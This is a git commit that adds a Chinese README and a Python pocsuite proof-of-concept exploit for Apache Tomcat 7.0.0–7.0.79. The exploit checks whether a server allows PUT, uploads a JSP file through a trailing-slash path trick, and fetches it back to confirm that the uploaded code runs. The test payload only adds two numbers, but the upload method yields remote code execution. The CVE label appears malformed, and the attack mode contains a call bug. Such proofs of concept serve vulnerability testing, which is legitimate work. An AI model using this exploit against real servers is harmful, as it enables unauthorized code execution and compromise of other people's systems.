*

2017-09-22 20:14:14 +08:00 · 2017-09-22 20:14:14 +08:00 · 10fcc5ee05
commit 10fcc5ee05
parent fec712c355
2 changed files with 68 additions and 0 deletions
--- a/Tomcat/Tomcat-7.0.0-7.0.79/README.md
+++ b/Tomcat/Tomcat-7.0.0-7.0.79/README.md
@ -0,0 +1 @@
+Apache-Tomcat-CVE-21625 当 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后，JSP 文件中的代码将能被服务器执行。
--- a/Tomcat/Tomcat-7.0.0-7.0.79/Tomcat-CVE-21625.py
+++ b/Tomcat/Tomcat-7.0.0-7.0.79/Tomcat-CVE-21625.py
@ -0,0 +1,67 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+# ver 7.0.81已经验证
+
+from pocsuite.net import req
+from pocsuite.poc import POCBase, Output
+from pocsuite.utils import register
+import random
+import time
+
+
+class TestPOC(POCBase):
+    name = "tomcat code execution"
+    vulID = ''
+    author = ['sebao']
+    vulType = 'code execution'
+    version = '1.0'    # default version: 1.0
+    references = ''
+    desc = '''Tomcat代码执行漏洞'''
+
+    vulDate = ''
+    createDate = '2017-9-20'
+    updateDate = '2017-9-20'
+
+    appName = 'Apache Tomcat'
+    appVersion = '7.0.0 - 7.0.79'
+    appPowerLink = ''
+    samples = []
+
+    def _attack(self):
+
+        result = {}
+        return self._verify(self)
+
+
+
+    def _verify(self):
+        '''verify mode'''
+        result = {}
+        a = random.randint(100000, 900000)
+        b = random.randint(100000, 900000)
+        body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%out.println({0}+{1});%>''' .format(str(a),str(b))
+        url = self.url
+        resp = req.options(url+'/asda',timeout=10)
+        if 'allow' in resp.headers and resp.headers['allow'].find('PUT') > 0:
+            shell_url = url + "/" + str(int(time.time())) +'.jsp/'
+            resp1=req.put(shell_url,body)
+            print resp1.status_code
+            resp2=req.get(shell_url[:-1])
+            c = a + b
+
+            if resp1.status_code == 201 and str(c) in resp2.content:
+                result['VerifyInfo'] = {}
+                result['VerifyInfo']['URL'] = url
+
+        return self.parse_output(result)
+
+    def parse_output(self, result):
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet nothing returned')
+        return output
+
+
+register(TestPOC)
				`@ -0,0 +1 @@`
				`Apache-Tomcat-CVE-21625 当 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法（例如，将 readonly 初始化参数由默认值设置为 false），攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后，JSP 文件中的代码将能被服务器执行。`